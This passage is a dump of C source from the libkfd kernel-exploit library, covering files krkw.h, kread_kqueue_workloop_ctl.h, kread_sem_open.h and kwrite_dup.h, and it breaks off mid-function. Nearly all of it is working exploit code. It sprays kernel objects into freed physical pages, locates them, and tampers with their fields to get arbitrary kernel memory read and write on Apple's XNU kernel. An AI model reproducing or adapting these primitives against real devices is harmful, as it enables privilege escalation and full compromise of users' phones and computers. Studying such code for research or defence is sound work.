ns##_BASE, \ 125 | .vmpp_bits = ns##_BITS, \ 126 | .vmpp_shift = ns##_SHIFT, \ 127 | .vmpp_base_relative = VM_PACKING_IS_BASE_RELATIVE(ns), \ 128 | } 129 | 130 | #define VM_UNPACK_POINTER(packed, ns) \ 131 | vm_unpack_pointer(packed, VM_PACKING_PARAMS(ns)) 132 | 133 | static inline u64 vm_page_unpack_ptr(u64 packed_page) 134 | { 135 | if (packed_page >= VM_PAGE_PACKED_FROM_ARRAY) { 136 | packed_page &= ~VM_PAGE_PACKED_FROM_ARRAY; 137 | return (u64)(&vm_pages[packed_page]); 
138 | } 139 | 140 | return VM_UNPACK_POINTER(packed_page, VM_PAGE_PACKED_PTR); 141 | } 142 | 143 | #define VM_PAGE_UNPACK_PTR(p) (vm_page_unpack_ptr((u64)(p))) 144 | #define VM_OBJECT_UNPACK(p) ((u64)(VM_UNPACK_POINTER(p, VM_PAGE_PACKED_PTR))) 145 | #define VM_PAGE_OBJECT(p) (VM_OBJECT_UNPACK((p)->vmp_object)) 146 | 147 | static inline u32 VM_PAGE_GET_PHYS_PAGE(struct vm_page* p) 148 | { 149 | assert((p >= vm_page_array_beginning_addr) && (p < vm_page_array_ending_addr)); 150 | return (u32)((u64)(p - vm_page_array_beginning_addr) + vm_first_phys_ppnum); 151 | } 152 | 153 | void print_vm_page(struct kfd* kfd, struct vm_page* page, u64 page_kaddr) 154 | { 155 | assert(vm_pages); 156 | assert(vm_page_array_beginning_addr); 157 | assert(vm_page_array_ending_addr); 158 | assert(vm_first_phys_ppnum); 159 | 160 | print_message("struct vm_page @ %016llx", page_kaddr); 161 | struct vm_page* p = (struct vm_page*)(page_kaddr); 162 | print_x32(VM_PAGE_GET_PHYS_PAGE(p)); 163 | print_x64(VM_PAGE_OBJECT(page)); 164 | print_x64(page->vmp_offset); 165 | print_u32(page->vmp_q_state); 166 | print_u32(page->vmp_on_specialq); 167 | print_bool(page->vmp_gobbled); 168 | print_bool(page->vmp_laundry); 169 | print_bool(page->vmp_no_cache); 170 | print_bool(page->vmp_private); 171 | print_bool(page->vmp_reference); 172 | print_bool(page->vmp_lopage); 173 | print_bool(page->vmp_realtime); 174 | print_bool(page->vmp_busy); 175 | print_bool(page->vmp_wanted); 176 | print_bool(page->vmp_tabled); 177 | print_bool(page->vmp_hashed); 178 | print_bool(page->vmp_fictitious); 179 | print_bool(page->vmp_clustered); 180 | print_bool(page->vmp_pmapped); 181 | print_bool(page->vmp_xpmapped); 182 | print_bool(page->vmp_wpmapped); 183 | print_bool(page->vmp_free_when_done); 184 | print_bool(page->vmp_absent); 185 | print_bool(page->vmp_error); 186 | print_bool(page->vmp_dirty); 187 | print_bool(page->vmp_cleaning); 188 | print_bool(page->vmp_precious); 189 | print_bool(page->vmp_overwriting); 190 | 
print_bool(page->vmp_restart); 191 | print_bool(page->vmp_unusual); 192 | print_bool(page->vmp_reusable); 193 | print_bool(page->vmp_written_by_kernel); 194 | } 195 | 196 | #endif /* vm_page_h */ 197 | -------------------------------------------------------------------------------- /kfd/libkfd/krkw.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef krkw_h 6 | #define krkw_h 7 | 8 | #define kread_from_method(type, method) \ 9 | do { \ 10 | volatile type* type_base = (volatile type*)(uaddr); \ 11 | u64 type_size = ((size) / (sizeof(type))); \ 12 | for (u64 type_offset = 0; type_offset < type_size; type_offset++) { \ 13 | type type_value = method(kfd, kaddr + (type_offset * sizeof(type))); \ 14 | type_base[type_offset] = type_value; \ 15 | } \ 16 | } while (0) 17 | 18 | #include "krkw/kread/kread_kqueue_workloop_ctl.h" 19 | #include "krkw/kread/kread_sem_open.h" 20 | 21 | #define kwrite_from_method(type, method) \ 22 | do { \ 23 | volatile type* type_base = (volatile type*)(uaddr); \ 24 | u64 type_size = ((size) / (sizeof(type))); \ 25 | for (u64 type_offset = 0; type_offset < type_size; type_offset++) { \ 26 | type type_value = type_base[type_offset]; \ 27 | method(kfd, kaddr + (type_offset * sizeof(type)), type_value); \ 28 | } \ 29 | } while (0) 30 | 31 | #include "krkw/kwrite/kwrite_dup.h" 32 | #include "krkw/kwrite/kwrite_sem_open.h" 33 | 34 | // Forward declarations for helper functions. 
35 | void krkw_helper_init(struct kfd* kfd, struct krkw* krkw); 36 | void krkw_helper_grab_free_pages(struct kfd* kfd); 37 | void krkw_helper_run_allocate(struct kfd* kfd, struct krkw* krkw); 38 | void krkw_helper_run_deallocate(struct kfd* kfd, struct krkw* krkw); 39 | void krkw_helper_free(struct kfd* kfd, struct krkw* krkw); 40 | 41 | #define kread_method_case(method) \ 42 | case method: { \ 43 | const char* method_name = #method; \ 44 | print_string(method_name); \ 45 | kfd->kread.krkw_method_ops.init = method##_init; \ 46 | kfd->kread.krkw_method_ops.allocate = method##_allocate; \ 47 | kfd->kread.krkw_method_ops.search = method##_search; \ 48 | kfd->kread.krkw_method_ops.kread = method##_kread; \ 49 | kfd->kread.krkw_method_ops.kwrite = NULL; \ 50 | kfd->kread.krkw_method_ops.find_proc = method##_find_proc; \ 51 | kfd->kread.krkw_method_ops.deallocate = method##_deallocate; \ 52 | kfd->kread.krkw_method_ops.free = method##_free; \ 53 | break; \ 54 | } 55 | 56 | #define kwrite_method_case(method) \ 57 | case method: { \ 58 | const char* method_name = #method; \ 59 | print_string(method_name); \ 60 | kfd->kwrite.krkw_method_ops.init = method##_init; \ 61 | kfd->kwrite.krkw_method_ops.allocate = method##_allocate; \ 62 | kfd->kwrite.krkw_method_ops.search = method##_search; \ 63 | kfd->kwrite.krkw_method_ops.kread = NULL; \ 64 | kfd->kwrite.krkw_method_ops.kwrite = method##_kwrite; \ 65 | kfd->kwrite.krkw_method_ops.find_proc = method##_find_proc; \ 66 | kfd->kwrite.krkw_method_ops.deallocate = method##_deallocate; \ 67 | kfd->kwrite.krkw_method_ops.free = method##_free; \ 68 | break; \ 69 | } 70 | 71 | void krkw_init(struct kfd* kfd, u64 kread_method, u64 kwrite_method) 72 | { 73 | switch (kread_method) { 74 | kread_method_case(kread_kqueue_workloop_ctl) 75 | kread_method_case(kread_sem_open) 76 | } 77 | 78 | switch (kwrite_method) { 79 | kwrite_method_case(kwrite_dup) 80 | kwrite_method_case(kwrite_sem_open) 81 | } 82 | 83 | krkw_helper_init(kfd, &kfd->kread); 
84 | krkw_helper_init(kfd, &kfd->kwrite); 85 | } 86 | 87 | void krkw_run(struct kfd* kfd) 88 | { 89 | krkw_helper_grab_free_pages(kfd); 90 | 91 | timer_start(); 92 | krkw_helper_run_allocate(kfd, &kfd->kread); 93 | krkw_helper_run_allocate(kfd, &kfd->kwrite); 94 | krkw_helper_run_deallocate(kfd, &kfd->kread); 95 | krkw_helper_run_deallocate(kfd, &kfd->kwrite); 96 | timer_end(); 97 | } 98 | 99 | void krkw_kread(struct kfd* kfd, u64 kaddr, void* uaddr, u64 size) 100 | { 101 | kfd->kread.krkw_method_ops.kread(kfd, kaddr, uaddr, size); 102 | } 103 | 104 | void krkw_kwrite(struct kfd* kfd, void* uaddr, u64 kaddr, u64 size) 105 | { 106 | kfd->kwrite.krkw_method_ops.kwrite(kfd, uaddr, kaddr, size); 107 | } 108 | 109 | void krkw_free(struct kfd* kfd) 110 | { 111 | krkw_helper_free(kfd, &kfd->kread); 112 | krkw_helper_free(kfd, &kfd->kwrite); 113 | } 114 | 115 | /* 116 | * Helper krkw functions. 117 | */ 118 | 119 | void krkw_helper_init(struct kfd* kfd, struct krkw* krkw) 120 | { 121 | krkw->krkw_method_ops.init(kfd); 122 | } 123 | 124 | void krkw_helper_grab_free_pages(struct kfd* kfd) 125 | { 126 | timer_start(); 127 | 128 | const u64 copy_pages = (kfd->info.copy.size / pages(1)); 129 | const u64 grabbed_puaf_pages_goal = (kfd->puaf.number_of_puaf_pages / 4); 130 | const u64 grabbed_free_pages_max = 400000; 131 | 132 | for (u64 grabbed_free_pages = copy_pages; grabbed_free_pages < grabbed_free_pages_max; grabbed_free_pages += copy_pages) { 133 | assert_mach(vm_copy(mach_task_self(), kfd->info.copy.src_uaddr, kfd->info.copy.size, kfd->info.copy.dst_uaddr)); 134 | 135 | u64 grabbed_puaf_pages = 0; 136 | for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { 137 | u64 puaf_page_uaddr = kfd->puaf.puaf_pages_uaddr[i]; 138 | if (!memcmp(copy_sentinel, (void*)(puaf_page_uaddr), copy_sentinel_size)) { 139 | if (++grabbed_puaf_pages == grabbed_puaf_pages_goal) { 140 | print_u64(grabbed_free_pages); 141 | timer_end(); 142 | return; 143 | } 144 | } 145 | } 146 | } 147 | 148 | 
print_warning("failed to grab free pages goal"); 149 | } 150 | 151 | void krkw_helper_run_allocate(struct kfd* kfd, struct krkw* krkw) 152 | { 153 | timer_start(); 154 | const u64 batch_size = (pages(1) / krkw->krkw_object_size); 155 | 156 | while (true) { 157 | /* 158 | * Spray a batch of objects, but stop if the maximum id has been reached. 159 | */ 160 | bool maximum_reached = false; 161 | 162 | for (u64 i = 0; i < batch_size; i++) { 163 | if (krkw->krkw_allocated_id == krkw->krkw_maximum_id) { 164 | maximum_reached = true; 165 | break; 166 | } 167 | 168 | krkw->krkw_method_ops.allocate(kfd, krkw->krkw_allocated_id); 169 | krkw->krkw_allocated_id++; 170 | } 171 | 172 | /* 173 | * Search the puaf pages for the last batch of objects. 174 | * 175 | * Note that we make the following assumptions: 176 | * - All objects have a 64-bit alignment. 177 | * - All objects can be found within 1/16th of a page. 178 | * - All objects have a size smaller than 15/16th of a page. 179 | */ 180 | for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { 181 | u64 puaf_page_uaddr = kfd->puaf.puaf_pages_uaddr[i]; 182 | u64 stop_uaddr = puaf_page_uaddr + (pages(1) / 16); 183 | for (u64 object_uaddr = puaf_page_uaddr; object_uaddr < stop_uaddr; object_uaddr += sizeof(u64)) { 184 | if (krkw->krkw_method_ops.search(kfd, object_uaddr)) { 185 | krkw->krkw_searched_id = krkw->krkw_object_id; 186 | krkw->krkw_object_uaddr = object_uaddr; 187 | goto loop_break; 188 | } 189 | } 190 | } 191 | 192 | krkw->krkw_searched_id = krkw->krkw_allocated_id; 193 | 194 | if (maximum_reached) { 195 | loop_break: 196 | break; 197 | } 198 | } 199 | 200 | timer_end(); 201 | const char* krkw_type = (krkw->krkw_method_ops.kread) ? 
"kread" : "kwrite"; 202 | 203 | if (!krkw->krkw_object_uaddr) { 204 | for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { 205 | u64 puaf_page_uaddr = kfd->puaf.puaf_pages_uaddr[i]; 206 | print_buffer(puaf_page_uaddr, 64); 207 | } 208 | 209 | assert_false(krkw_type); 210 | } 211 | 212 | print_message( 213 | "%s ---> object_id = %llu, object_uaddr = 0x%016llx, object_size = %llu, allocated_id = %llu/%llu, batch_size = %llu", 214 | krkw_type, 215 | krkw->krkw_object_id, 216 | krkw->krkw_object_uaddr, 217 | krkw->krkw_object_size, 218 | krkw->krkw_allocated_id, 219 | krkw->krkw_maximum_id, 220 | batch_size 221 | ); 222 | 223 | print_buffer(krkw->krkw_object_uaddr, krkw->krkw_object_size); 224 | 225 | if (!kfd->info.kaddr.current_proc) { 226 | krkw->krkw_method_ops.find_proc(kfd); 227 | } 228 | } 229 | 230 | void krkw_helper_run_deallocate(struct kfd* kfd, struct krkw* krkw) 231 | { 232 | timer_start(); 233 | 234 | for (u64 id = 0; id < krkw->krkw_allocated_id; id++) { 235 | if (id == krkw->krkw_object_id) { 236 | continue; 237 | } 238 | 239 | krkw->krkw_method_ops.deallocate(kfd, id); 240 | } 241 | 242 | timer_end(); 243 | } 244 | 245 | void krkw_helper_free(struct kfd* kfd, struct krkw* krkw) 246 | { 247 | krkw->krkw_method_ops.free(kfd); 248 | 249 | if (krkw->krkw_method_data) { 250 | bzero_free(krkw->krkw_method_data, krkw->krkw_method_data_size); 251 | } 252 | } 253 | 254 | #endif /* krkw_h */ 255 | -------------------------------------------------------------------------------- /kfd/libkfd/krkw/kread/kread_kqueue_workloop_ctl.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 
3 | */ 4 | 5 | #ifndef kread_kqueue_workloop_ctl_h 6 | #define kread_kqueue_workloop_ctl_h 7 | 8 | const u64 kread_kqueue_workloop_ctl_sentinel = 0x1122334455667788; 9 | 10 | u64 kread_kqueue_workloop_ctl_kread_u64(struct kfd* kfd, u64 kaddr); 11 | 12 | void kread_kqueue_workloop_ctl_init(struct kfd* kfd) 13 | { 14 | kfd->kread.krkw_maximum_id = 100000; 15 | kfd->kread.krkw_object_size = dynamic_sizeof(kqworkloop); 16 | } 17 | 18 | void kread_kqueue_workloop_ctl_allocate(struct kfd* kfd, u64 id) 19 | { 20 | struct kqueue_workloop_params params = { 21 | .kqwlp_version = (i32)(sizeof(params)), 22 | .kqwlp_flags = KQ_WORKLOOP_CREATE_SCHED_PRI, 23 | .kqwlp_id = id + kread_kqueue_workloop_ctl_sentinel, 24 | .kqwlp_sched_pri = 1, 25 | }; 26 | 27 | u64 cmd = KQ_WORKLOOP_CREATE; 28 | u64 options = 0; 29 | u64 addr = (u64)(¶ms); 30 | usize sz = (usize)(params.kqwlp_version); 31 | assert_bsd(syscall(SYS_kqueue_workloop_ctl, cmd, options, addr, sz)); 32 | } 33 | 34 | bool kread_kqueue_workloop_ctl_search(struct kfd* kfd, u64 object_uaddr) 35 | { 36 | u64 sentinel_min = kread_kqueue_workloop_ctl_sentinel; 37 | u64 sentinel_max = sentinel_min + kfd->kread.krkw_allocated_id; 38 | 39 | u16 kqwl_state = dynamic_uget(kqworkloop, kqwl_state, object_uaddr); 40 | u64 kqwl_dynamicid = dynamic_uget(kqworkloop, kqwl_dynamicid, object_uaddr); 41 | 42 | if ((kqwl_state == (KQ_KEV_QOS | KQ_WORKLOOP | KQ_DYNAMIC)) && 43 | (kqwl_dynamicid >= sentinel_min) && 44 | (kqwl_dynamicid < sentinel_max)) { 45 | u64 object_id = kqwl_dynamicid - sentinel_min; 46 | kfd->kread.krkw_object_id = object_id; 47 | return true; 48 | } 49 | 50 | return false; 51 | } 52 | 53 | void kread_kqueue_workloop_ctl_kread(struct kfd* kfd, u64 kaddr, void* uaddr, u64 size) 54 | { 55 | kread_from_method(u64, kread_kqueue_workloop_ctl_kread_u64); 56 | } 57 | 58 | void kread_kqueue_workloop_ctl_find_proc(struct kfd* kfd) 59 | { 60 | u64 kqworkloop_uaddr = kfd->kread.krkw_object_uaddr; 61 | kfd->info.kaddr.current_proc = 
dynamic_uget(kqworkloop, kqwl_p, kqworkloop_uaddr); 62 | } 63 | 64 | void kread_kqueue_workloop_ctl_deallocate(struct kfd* kfd, u64 id) 65 | { 66 | struct kqueue_workloop_params params = { 67 | .kqwlp_version = (i32)(sizeof(params)), 68 | .kqwlp_id = id + kread_kqueue_workloop_ctl_sentinel, 69 | }; 70 | 71 | u64 cmd = KQ_WORKLOOP_DESTROY; 72 | u64 options = 0; 73 | u64 addr = (u64)(¶ms); 74 | usize sz = (usize)(params.kqwlp_version); 75 | assert_bsd(syscall(SYS_kqueue_workloop_ctl, cmd, options, addr, sz)); 76 | } 77 | 78 | void kread_kqueue_workloop_ctl_free(struct kfd* kfd) 79 | { 80 | kread_kqueue_workloop_ctl_deallocate(kfd, kfd->kread.krkw_object_id); 81 | } 82 | 83 | /* 84 | * 64-bit kread function. 85 | */ 86 | 87 | u64 kread_kqueue_workloop_ctl_kread_u64(struct kfd* kfd, u64 kaddr) 88 | { 89 | u64 kqworkloop_uaddr = kfd->kread.krkw_object_uaddr; 90 | u64 old_kqwl_owner = dynamic_uget(kqworkloop, kqwl_owner, kqworkloop_uaddr); 91 | u64 new_kqwl_owner = kaddr - dynamic_offsetof(thread, thread_id); 92 | dynamic_uset(kqworkloop, kqwl_owner, kqworkloop_uaddr, new_kqwl_owner); 93 | 94 | struct kqueue_dyninfo data = {}; 95 | i32 callnum = PROC_INFO_CALL_PIDDYNKQUEUEINFO; 96 | i32 pid = kfd->info.env.pid; 97 | u32 flavor = PROC_PIDDYNKQUEUE_INFO; 98 | u64 arg = kfd->kread.krkw_object_id + kread_kqueue_workloop_ctl_sentinel; 99 | u64 buffer = (u64)(&data); 100 | i32 buffersize = (i32)(sizeof(struct kqueue_dyninfo)); 101 | assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); 102 | 103 | dynamic_uset(kqworkloop, kqwl_owner, kqworkloop_uaddr, old_kqwl_owner); 104 | return data.kqdi_owner; 105 | } 106 | 107 | #endif /* kread_kqueue_workloop_ctl_h */ 108 | -------------------------------------------------------------------------------- /kfd/libkfd/krkw/kread/kread_sem_open.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 
3 | */ 4 | 5 | #ifndef kread_sem_open_h 6 | #define kread_sem_open_h 7 | 8 | const char* kread_sem_open_name = "kfd-posix-semaphore"; 9 | 10 | u64 kread_sem_open_kread_u64(struct kfd* kfd, u64 kaddr); 11 | u32 kread_sem_open_kread_u32(struct kfd* kfd, u64 kaddr); 12 | 13 | void kread_sem_open_init(struct kfd* kfd) 14 | { 15 | kfd->kread.krkw_maximum_id = kfd->info.env.maxfilesperproc - 100; 16 | kfd->kread.krkw_object_size = sizeof(struct psemnode); 17 | 18 | kfd->kread.krkw_method_data_size = ((kfd->kread.krkw_maximum_id + 1) * (sizeof(i32))) + sizeof(struct psem_fdinfo); 19 | kfd->kread.krkw_method_data = malloc_bzero(kfd->kread.krkw_method_data_size); 20 | 21 | sem_unlink(kread_sem_open_name); 22 | i32 sem_fd = (i32)(usize)(sem_open(kread_sem_open_name, (O_CREAT | O_EXCL), (S_IRUSR | S_IWUSR), 0)); 23 | assert(sem_fd > 0); 24 | 25 | i32* fds = (i32*)(kfd->kread.krkw_method_data); 26 | fds[kfd->kread.krkw_maximum_id] = sem_fd; 27 | 28 | struct psem_fdinfo* sem_data = (struct psem_fdinfo*)(&fds[kfd->kread.krkw_maximum_id + 1]); 29 | i32 callnum = PROC_INFO_CALL_PIDFDINFO; 30 | i32 pid = kfd->info.env.pid; 31 | u32 flavor = PROC_PIDFDPSEMINFO; 32 | u64 arg = sem_fd; 33 | u64 buffer = (u64)(sem_data); 34 | i32 buffersize = (i32)(sizeof(struct psem_fdinfo)); 35 | assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); 36 | } 37 | 38 | void kread_sem_open_allocate(struct kfd* kfd, u64 id) 39 | { 40 | i32 fd = (i32)(usize)(sem_open(kread_sem_open_name, 0, 0, 0)); 41 | assert(fd > 0); 42 | 43 | i32* fds = (i32*)(kfd->kread.krkw_method_data); 44 | fds[id] = fd; 45 | } 46 | 47 | bool kread_sem_open_search(struct kfd* kfd, u64 object_uaddr) 48 | { 49 | volatile struct psemnode* pnode = (volatile struct psemnode*)(object_uaddr); 50 | i32* fds = (i32*)(kfd->kread.krkw_method_data); 51 | struct psem_fdinfo* sem_data = (struct psem_fdinfo*)(&fds[kfd->kread.krkw_maximum_id + 1]); 52 | 53 | if ((pnode[0].pinfo > pac_mask) && 54 | 
(pnode[1].pinfo == pnode[0].pinfo) && 55 | (pnode[2].pinfo == pnode[0].pinfo) && 56 | (pnode[3].pinfo == pnode[0].pinfo) && 57 | (pnode[0].padding == 0) && 58 | (pnode[1].padding == 0) && 59 | (pnode[2].padding == 0) && 60 | (pnode[3].padding == 0)) { 61 | for (u64 object_id = kfd->kread.krkw_searched_id; object_id < kfd->kread.krkw_allocated_id; object_id++) { 62 | struct psem_fdinfo data = {}; 63 | i32 callnum = PROC_INFO_CALL_PIDFDINFO; 64 | i32 pid = kfd->info.env.pid; 65 | u32 flavor = PROC_PIDFDPSEMINFO; 66 | u64 arg = fds[object_id]; 67 | u64 buffer = (u64)(&data); 68 | i32 buffersize = (i32)(sizeof(struct psem_fdinfo)); 69 | 70 | const u64 shift_amount = 4; 71 | pnode[0].pinfo += shift_amount; 72 | assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); 73 | pnode[0].pinfo -= shift_amount; 74 | 75 | if (!memcmp(&data.pseminfo.psem_name[0], &sem_data->pseminfo.psem_name[shift_amount], 16)) { 76 | kfd->kread.krkw_object_id = object_id; 77 | return true; 78 | } 79 | } 80 | 81 | /* 82 | * False alarm: it wasn't one of our psemmode objects. 83 | */ 84 | print_warning("failed to find modified psem_name sentinel"); 85 | } 86 | 87 | return false; 88 | } 89 | 90 | void kread_sem_open_kread(struct kfd* kfd, u64 kaddr, void* uaddr, u64 size) 91 | { 92 | kread_from_method(u64, kread_sem_open_kread_u64); 93 | } 94 | 95 | void kread_sem_open_find_proc(struct kfd* kfd) 96 | { 97 | u64 pseminfo_kaddr = static_uget(psemnode, pinfo, kfd->kread.krkw_object_uaddr); 98 | u64 semaphore_kaddr = static_kget(pseminfo, u64, psem_semobject, pseminfo_kaddr); 99 | u64 task_kaddr = static_kget(semaphore, u64, owner, semaphore_kaddr); 100 | u64 proc_kaddr = task_kaddr - dynamic_sizeof(proc); 101 | kfd->info.kaddr.kernel_proc = proc_kaddr; 102 | 103 | /* 104 | * Go backwards from the kernel_proc, which is the last proc in the list. 
105 | */ 106 | while (true) { 107 | i32 pid = dynamic_kget(proc, p_pid, proc_kaddr); 108 | if (pid == kfd->info.env.pid) { 109 | kfd->info.kaddr.current_proc = proc_kaddr; 110 | break; 111 | } 112 | 113 | proc_kaddr = dynamic_kget(proc, p_list_le_prev, proc_kaddr); 114 | } 115 | } 116 | 117 | void kread_sem_open_deallocate(struct kfd* kfd, u64 id) 118 | { 119 | /* 120 | * Let kwrite_sem_open_deallocate() take care of 121 | * deallocating all the shared file descriptors. 122 | */ 123 | return; 124 | } 125 | 126 | void kread_sem_open_free(struct kfd* kfd) 127 | { 128 | /* 129 | * Let's null out the kread reference to the shared data buffer 130 | * because kwrite_sem_open_free() needs it and will free it. 131 | */ 132 | kfd->kread.krkw_method_data = NULL; 133 | } 134 | 135 | /* 136 | * 64-bit kread function. 137 | */ 138 | 139 | u64 kread_sem_open_kread_u64(struct kfd* kfd, u64 kaddr) 140 | { 141 | i32* fds = (i32*)(kfd->kread.krkw_method_data); 142 | i32 kread_fd = fds[kfd->kread.krkw_object_id]; 143 | u64 psemnode_uaddr = kfd->kread.krkw_object_uaddr; 144 | 145 | u64 old_pinfo = static_uget(psemnode, pinfo, psemnode_uaddr); 146 | u64 new_pinfo = kaddr - static_offsetof(pseminfo, psem_uid); 147 | static_uset(psemnode, pinfo, psemnode_uaddr, new_pinfo); 148 | 149 | struct psem_fdinfo data = {}; 150 | i32 callnum = PROC_INFO_CALL_PIDFDINFO; 151 | i32 pid = kfd->info.env.pid; 152 | u32 flavor = PROC_PIDFDPSEMINFO; 153 | u64 arg = kread_fd; 154 | u64 buffer = (u64)(&data); 155 | i32 buffersize = (i32)(sizeof(struct psem_fdinfo)); 156 | assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); 157 | 158 | static_uset(psemnode, pinfo, psemnode_uaddr, old_pinfo); 159 | return *(u64*)(&data.pseminfo.psem_stat.vst_uid); 160 | } 161 | 162 | /* 163 | * 32-bit kread function that is guaranteed to not underflow a page, 164 | * i.e. those 4 bytes are the first 4 bytes read by the modified kernel pointer. 
165 | */ 166 | 167 | u32 kread_sem_open_kread_u32(struct kfd* kfd, u64 kaddr) 168 | { 169 | i32* fds = (i32*)(kfd->kread.krkw_method_data); 170 | i32 kread_fd = fds[kfd->kread.krkw_object_id]; 171 | u64 psemnode_uaddr = kfd->kread.krkw_object_uaddr; 172 | 173 | u64 old_pinfo = static_uget(psemnode, pinfo, psemnode_uaddr); 174 | u64 new_pinfo = kaddr - static_offsetof(pseminfo, psem_usecount); 175 | static_uset(psemnode, pinfo, psemnode_uaddr, new_pinfo); 176 | 177 | struct psem_fdinfo data = {}; 178 | i32 callnum = PROC_INFO_CALL_PIDFDINFO; 179 | i32 pid = kfd->info.env.pid; 180 | u32 flavor = PROC_PIDFDPSEMINFO; 181 | u64 arg = kread_fd; 182 | u64 buffer = (u64)(&data); 183 | i32 buffersize = (i32)(sizeof(struct psem_fdinfo)); 184 | assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); 185 | 186 | static_uset(psemnode, pinfo, psemnode_uaddr, old_pinfo); 187 | return *(u32*)(&data.pseminfo.psem_stat.vst_size); 188 | } 189 | 190 | #endif /* kread_sem_open_h */ 191 | -------------------------------------------------------------------------------- /kfd/libkfd/krkw/kwrite/kwrite_dup.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 
 */

#ifndef kwrite_dup_h
#define kwrite_dup_h

void kwrite_dup_kwrite_u64(struct kfd* kfd, u64 kaddr, u64 new_value);

// Set up the dup()-based kwrite method: reserve space for one fd per
// possible object id, plus one extra slot (at krkw_maximum_id) holding the
// kqueue fd that all later dup() calls clone.
void kwrite_dup_init(struct kfd* kfd)
{
    // Leave 100 fds of headroom below the per-process limit.
    kfd->kwrite.krkw_maximum_id = kfd->info.env.maxfilesperproc - 100;
    kfd->kwrite.krkw_object_size = sizeof(struct fileproc);

    kfd->kwrite.krkw_method_data_size = ((kfd->kwrite.krkw_maximum_id + 1) * (sizeof(i32)));
    kfd->kwrite.krkw_method_data = malloc_bzero(kfd->kwrite.krkw_method_data_size);

    i32 kqueue_fd = kqueue();
    assert(kqueue_fd > 0); // NOTE(review): fd 0 would be valid; in practice stdin occupies it.

    i32* fds = (i32*)(kfd->kwrite.krkw_method_data);
    fds[kfd->kwrite.krkw_maximum_id] = kqueue_fd;
}

// Spray one fileproc by dup()ing the shared kqueue fd into slot "id".
void kwrite_dup_allocate(struct kfd* kfd, u64 id)
{
    i32* fds = (i32*)(kfd->kwrite.krkw_method_data);
    i32 kqueue_fd = fds[kfd->kwrite.krkw_maximum_id];
    i32 fd = dup(kqueue_fd);
    assert(fd > 0);
    fds[id] = fd;
}

// Decide whether the fileproc overlapping the PUAF page at object_uaddr is
// one of ours: first check for a pristine-looking fileproc, then toggle
// FD_CLOEXEC (which sets fp_flags to 1) on each candidate fd and watch for
// the change through the dangling PTE.
bool kwrite_dup_search(struct kfd* kfd, u64 object_uaddr)
{
    i32* fds = (i32*)(kfd->kwrite.krkw_method_data);

    if ((static_uget(fileproc, fp_iocount, object_uaddr) == 1) &&
        (static_uget(fileproc, fp_vflags, object_uaddr) == 0) &&
        (static_uget(fileproc, fp_flags, object_uaddr) == 0) &&
        (static_uget(fileproc, fp_guard_attrs, object_uaddr) == 0) &&
        (static_uget(fileproc, fp_glob, object_uaddr) > ptr_mask) &&
        (static_uget(fileproc, fp_guard, object_uaddr) == 0)) {
        for (u64 object_id = kfd->kwrite.krkw_searched_id; object_id < kfd->kwrite.krkw_allocated_id; object_id++) {
            assert_bsd(fcntl(fds[object_id], F_SETFD, FD_CLOEXEC));

            // If the sentinel became visible through the PUAF page, this fd's
            // fileproc is the overlapping object.
            if (static_uget(fileproc, fp_flags, object_uaddr) == 1) {
                kfd->kwrite.krkw_object_id = object_id;
                return true;
            }

            assert_bsd(fcntl(fds[object_id], F_SETFD, 0));
        }

        /*
         * False alarm: it wasn't one of our fileproc objects.
         */
        print_warning("failed to find modified fp_flags sentinel");
    }

    return false;
}

// Generic kwrite entry point: delegates to the u64 primitive in chunks.
void kwrite_dup_kwrite(struct kfd* kfd, void* uaddr, u64 kaddr, u64 size)
{
    kwrite_from_method(u64, kwrite_dup_kwrite_u64);
}

void kwrite_dup_find_proc(struct kfd* kfd)
{
    /*
     * Assume that kread is responsible for that.
     */
    return;
}

// Close the fd backing object "id".
void kwrite_dup_deallocate(struct kfd* kfd, u64 id)
{
    i32* fds = (i32*)(kfd->kwrite.krkw_method_data);
    assert_bsd(close(fds[id]));
}

// Tear down the method: close the winning fd and the shared kqueue fd.
// (Remaining sprayed fds were already closed by the framework's deallocate pass.)
void kwrite_dup_free(struct kfd* kfd)
{
    kwrite_dup_deallocate(kfd, kfd->kwrite.krkw_object_id);
    kwrite_dup_deallocate(kfd, kfd->kwrite.krkw_maximum_id);
}

/*
 * 64-bit kwrite function.
 *
 * Mechanism: temporarily mark our overlapping fileproc as guarded
 * (GUARD_REQUIRED) with fp_guard redirected so that fpg_guard overlaps the
 * target kernel address. change_fdguard_np() then compares the old guard
 * value (which we must know, hence the kread) and swaps in new_value,
 * giving an 8-byte controlled kernel write. Both fields are restored after.
 * Note: a guard value of 0 is rejected by the kernel, so neither the old
 * nor the new value may be 0.
 */

void kwrite_dup_kwrite_u64(struct kfd* kfd, u64 kaddr, u64 new_value)
{
    if (new_value == 0) {
        print_warning("cannot write 0");
        return;
    }

    i32* fds = (i32*)(kfd->kwrite.krkw_method_data);
    i32 kwrite_fd = fds[kfd->kwrite.krkw_object_id];
    u64 fileproc_uaddr = kfd->kwrite.krkw_object_uaddr;

    const bool allow_retry = false;

    do {
        // change_fdguard_np() verifies the current guard, so fetch it first.
        u64 old_value = 0;
        kread((u64)(kfd), kaddr, &old_value, sizeof(old_value));

        if (old_value == 0) {
            print_warning("cannot overwrite 0");
            return;
        }

        if (old_value == new_value) {
            break;
        }

        u16 old_fp_guard_attrs = static_uget(fileproc, fp_guard_attrs, fileproc_uaddr);
        u16 new_fp_guard_attrs = GUARD_REQUIRED;
        static_uset(fileproc, fp_guard_attrs, fileproc_uaddr, new_fp_guard_attrs);

